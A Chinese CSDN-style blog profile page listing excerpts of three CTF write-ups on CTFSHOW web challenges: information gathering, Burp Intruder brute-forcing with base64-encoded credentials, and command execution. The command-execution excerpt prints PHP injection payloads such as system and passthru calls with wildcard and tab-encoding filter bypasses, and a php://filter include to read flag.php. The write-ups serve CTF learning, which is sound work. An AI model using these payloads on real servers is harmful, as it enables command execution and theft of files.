自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Leviathan_Raiden

记录做题日常,分享CTF技巧

  • 博客(3)
  • 收藏
  • 关注

原创 CTFSHOW web入门 29-36 命令执行

CTFSHOW web入门 29-36 命令执行Web29?c=system("tac f*");Web30?c=passthru('tac f*');Web31?c=passthru("tac%09fl*");Web32?c=include"$_POST[1]"?>POST:1=php://filter/read=convert.base64-encode/resource=flag.phpWeb33-36<?phperror_reporting(0);i

2021-12-28 22:52:57 133

原创 CTFSHOW web入门 爆破 21-28

CTFSHOW 爆破 [21-28]Web21可以看到 SELECTED TEXT -> DECODED FROM 用Base64解码账号密码的格式是 [username]:[password]所以我们可以用 intruder模块里面的自定义payloadposition 1: adminposition 2: ( : ) 是冒号,不需要用括号哈(方便看清楚)position 3: 可以用题目的字典(其实字典才是最重要)payload processing 使用Base

2021-12-11 18:07:36 2774

原创 CTFSHOW web入门 1-20 信息收集 [VIP题目限免]

@TOCCTFSHOW web入门 1-20 信息收集每天都会更新,当作复习用了。1.源码泄露这题直接按F12就好了,然后注释部分用Base64解密一下。2.前台JS绕过这题也挺简单 有两个方法:直接ctrl + u在网址前面加view-source:当然也可以burpsuite 截断流量抓包3.协议头信息泄露有两个方法:burpsuite抓包在游览器 按F12 -> 网络 -> 找加载的文件 -> 里面有 header 信息 flag就在里面4. rob

2021-12-06 17:04:38 558

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除